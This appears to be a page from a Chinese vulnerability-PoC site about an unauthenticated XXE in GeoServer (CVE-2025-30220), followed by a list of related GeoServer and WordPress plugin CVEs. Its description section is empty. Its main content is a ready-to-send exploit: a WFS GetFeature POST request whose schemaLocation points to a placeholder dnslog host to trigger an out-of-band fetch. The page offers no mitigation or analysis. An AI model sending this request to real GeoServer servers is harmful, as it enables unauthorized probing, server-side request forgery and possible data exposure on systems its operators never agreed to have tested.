Geoserver 未授权XXE CVE-2025-30220

漏洞描述

PoC代码

POST /geoserver/wfs HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
Connection: close
Content-Type: application/xml
Accept-Encoding: gzip

<wfs:GetFeature service="WFS" version="1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:topp="http://www.openplans.org/topp"
xsi:schemaLocation="http://a http://dnslog地址/xxe.xsd"
outputFormat="KML">
<wfs:Query typeName="topp:states"/>
</wfs:GetFeature>

相关漏洞推荐

• CVE-2021-40822: Geoserver - Server-Side Request Forgery POC

  2025-09-01 | Geoserver
  GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option...

• CVE-2022-24816: GeoServer <1.2.2 - Remote Code Execution POC

  2025-09-01 | GeoServer
  Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided vi...

• CVE-2023-25157: GeoServer OGC Filter - SQL Injection POC

  2025-09-01 | GeoServer
  GeoServer is an open source software server written in Java that allows users to share and edit geos...

• Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

  2025-09-19 | Wordpress
  WordPress插件Depicter的滑块和弹出窗口构建器在包括3.6.1版本在内的所有版本中，由于用户提供的参数缺乏足够的转义处理和现有SQL查询的预处理不足，存在通用的SQL注入漏洞。该漏洞可以...

• Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

  2025-09-19 | Wordpress
  Event Manager, Events Calendar, Tickets, Registrations – Eventin 是一个用于 WordPress 的插件。该漏洞存在于其 proxy_i...